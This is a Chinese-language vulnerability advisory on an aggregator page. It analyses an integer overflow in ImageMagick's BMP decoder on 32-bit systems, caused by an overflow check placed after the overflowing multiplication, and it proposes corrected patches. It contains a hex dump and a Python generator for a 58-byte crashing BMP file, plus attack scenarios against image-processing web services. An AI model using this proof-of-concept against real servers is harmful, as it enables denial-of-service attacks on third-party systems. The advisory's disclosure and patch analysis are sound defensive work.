当前位置: 首页 > news >正文

ImageMagick BMP解码器整数溢出漏洞深度分析

ImageMagick BMP解码器整数溢出漏洞(CVE-2025-62171)

漏洞详情

包信息

  • NuGet包:Magick.NET-Q16-AnyCPU、Magick.NET-Q16-HDRI-AnyCPU等
  • 受影响版本:< 14.9.0
  • 已修复版本:14.9.0

漏洞描述

CVE-2025-57803声称在ImageMagick 7.1.2-2中已修复,但实际上修复不完整且无效。最新版本7.1.2-5仍然容易受到相同的整数溢出攻击。

补丁添加了BMPOverflowCheck()函数,但将其放置在溢出发生之后,使其变得无用。一个恶意的58字节BMP文件可以触发AddressSanitizer崩溃和拒绝服务。

受影响版本:

  • ImageMagick < 7.1.2-2(最初报告)
  • ImageMagick 7.1.2-2 至 7.1.2-5(不完整补丁)

平台和配置要求:

  • 仅限32位系统(i386、i686、armv7l等)
  • 需要size_t = 4字节(64位系统不易受攻击)
  • 需要修改资源限制:必须手动增加默认的宽度、高度和区域限制

详细分析(根本原因分析)

易受攻击的代码位置
文件:coders/bmp.c
行数:1120-1122(版本7.1.2-5)

不完整的补丁

// 第1120行:整数溢出在此发生
extent = image->columns * bmp_info.bits_per_pixel;  // 溢出!// 第1121行:使用已溢出的值
bytes_per_line = 4*((extent+31)/32);// 第1122行:检查结果,而不是乘法运算
if (BMPOverflowCheck(bytes_per_line, image->rows) != MagickFalse)ThrowReaderException(CorruptImageError, "InsufficientImageDataInFile");

补丁失败的原因
攻击向量(32位系统):
输入BMP头:

  • 宽度:536,870,912 (0x20000000)
  • 高度:1
  • 每像素位数:32

32位系统上的计算:

extent = 536,870,912 × 32= 17,179,869,184 (0x400000000)32位截断:
0x400000000 & 0xFFFFFFFF = 0x00000000 ← 溢出为零!bytes_per_line = 4 × ((0 + 31) / 32)= 4 × 0= 0BMPOverflowCheck(0, 1):return (1 != 0) && (0 > 4294967295UL/1)return True && (0 > 4294967295)return True && Falsereturn False ← 未检测到溢出!

概念验证(PoC)

最小58字节BMP文件
十六进制转储:

00000000  42 4d 3a 00 00 00 00 00  00 00 36 00 00 00 28 00  |BM:.......6...(.|
00000010  00 00 00 00 00 20 01 00  00 00 01 00 20 00 00 00  |..... ...... ...|
00000020  00 00 00 00 00 00 13 0b  00 00 13 0b 00 00 00 00  |................|
00000030  00 00 00 00 00 00 00 00  00 00                    |..........|

Python生成器

#!/usr/bin/env python3
import structwidth = 0x20000000   # 536,870,912
height = 1
bpp = 32# BMP文件头(14字节)
file_header = b'BM'
file_header += struct.pack('<I', 58)      # 文件大小
file_header += struct.pack('<HH', 0, 0)   # 保留
file_header += struct.pack('<I', 54)      # 像素偏移# DIB头(40字节)
dib_header = struct.pack('<I', 40)        # 头大小
dib_header += struct.pack('<i', width)    # 宽度
dib_header += struct.pack('<i', height)   # 高度
dib_header += struct.pack('<H', 1)        # 平面
dib_header += struct.pack('<H', bpp)      # BPP
dib_header += struct.pack('<I', 0)        # 压缩
dib_header += struct.pack('<I', 0)        # 图像大小
dib_header += struct.pack('<i', 2835)     # X ppm
dib_header += struct.pack('<i', 2835)     # Y ppm
dib_header += struct.pack('<I', 0)        # 颜色
dib_header += struct.pack('<I', 0)        # 重要颜色pixel_data = b'\x00\x00\x00\x00'with open('overflow.bmp', 'wb') as f:f.write(file_header + dib_header + pixel_data)print(f"Created overflow.bmp (58 bytes)")

影响

攻击场景

  • 攻击者创建58字节的恶意BMP文件
  • 上传到使用ImageMagick的Web服务(在32位系统上)
  • ImageMagick尝试处理图像
  • 整数溢出触发AddressSanitizer崩溃
  • 服务变得不可用(拒绝服务)

实际目标:

  • 具有图像处理功能的Web托管平台
  • 具有缩略图生成功能的CDN服务
  • 传统嵌入式系统
  • 运行32位Linux的IoT设备
  • 使用32位基础镜像的Docker容器

推荐修复

正确的补丁
溢出检查必须在乘法运算之前进行:

// 在计算extent之前添加溢出检查
if (BMPOverflowCheck(image->columns, bmp_info.bits_per_pixel) != MagickFalse)ThrowReaderException(CorruptImageError, "IntegerOverflowInDimensions");// 现在安全计算
extent = image->columns * bmp_info.bits_per_pixel;
bytes_per_line = 4*((extent+31)/32);// 额外的安全检查
if (BMPOverflowCheck(bytes_per_line, image->rows) != MagickFalse)ThrowReaderException(CorruptImageError, "InsufficientImageDataInFile");

替代方案:使用64位算术

// 强制64位计算
uint64_t extent_64 = (uint64_t)image->columns * (uint64_t)bmp_info.bits_per_pixel;if (extent_64 > UINT32_MAX)ThrowReaderException(CorruptImageError, "ImageDimensionsTooLarge");extent = (size_t)extent_64;
bytes_per_line = 4*((extent+31)/32);

参考信息

  • GHSA-9pp9-cfwx-54rm
  • https://nvd.nist.gov/vuln/detail/CVE-2025-62171
  • ImageMagick/ImageMagick@cea1693
  • https://github.com/dlemstra/Magick.NET/releases/tag/14.9.0
  • https://lists.debian.org/debian-lts-announce/2025/10/msg00019.html
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

http://www.jsqmd.com/news/54921/

相关文章:

  • 2025年立式等动拉力器厂家权威推荐榜单:游泳专业设备/仰泳出发器‌/游泳专业路面模拟器‌源头厂家精选
  • 2025年比较好的员工福利商城/员工福利品质保障
  • 四川成都专业可靠的小程序开发公司-支持先做后付,满意付款
  • 你真的懂 C++ 吗?来看看这 5 个问题吧!
  • 国内专业诚信的小程序开发企业推荐
  • 完整教程:十七、STM32的TIM(八)(TIM输入捕获)
  • 【ArcMap】合并同一条线的多个部分
  • 2025年靠谱的高端生态红茶/安全生态红茶推荐TOP生产厂家
  • 2025年比较好的郑州注册公司客户好评推荐
  • 2025年线上英语培训机构权威推荐榜单:高性价比英语/成人英语培训/英语口语教育培训平台精选
  • 2025年整流二极管模块生产商权威推荐榜单:肖特基二极管/快恢复二极管/焊机二极管源头厂家精选
  • 深入解析:关于 密码喷射
  • 2025年靠谱的精酿啤酒机/精酿啤酒设备最新TOP排名厂家
  • HTML------------------课程表
  • 2025年专业的质量管理体系认证行业企业体系认证推荐榜
  • 2025年靠谱的树脂瓦厂家推荐及采购指南
  • 2025年专注离婚财产分割的离婚财产分割律师热门榜单
  • 优秀可靠的小程序开发公司推荐
  • 小程序开发企业2025推荐,高性价比与专业定制兼具
  • 2025年海南人力资源管理师培训服务权威推荐榜单:人力资源管理师考证/高级人力资源管理师培训/中级人力资源管理师培训优质机构精选
  • 2025年专业的短视频运营行业领先榜
  • 2025年北京名表回收公司权威推荐榜单:银元回收/钻戒回收‌/钻石回收‌源头公司精选
  • LAUNCH EVT511: Reliable EV Battery Airtightness Testing for Mechanics Owners
  • iFlow x Kimi K2实战案例:10分钟完成IP段设置任务
  • 2025年耐用的青年鸡必买推荐榜
  • 课程表
  • 国内优质的稳压器生产厂家有哪些?
  • 2025年靠谱的白水苹果市场热度榜
  • 读书日记4
  • 2025年靠谱的常熟劳务派遣行业领航榜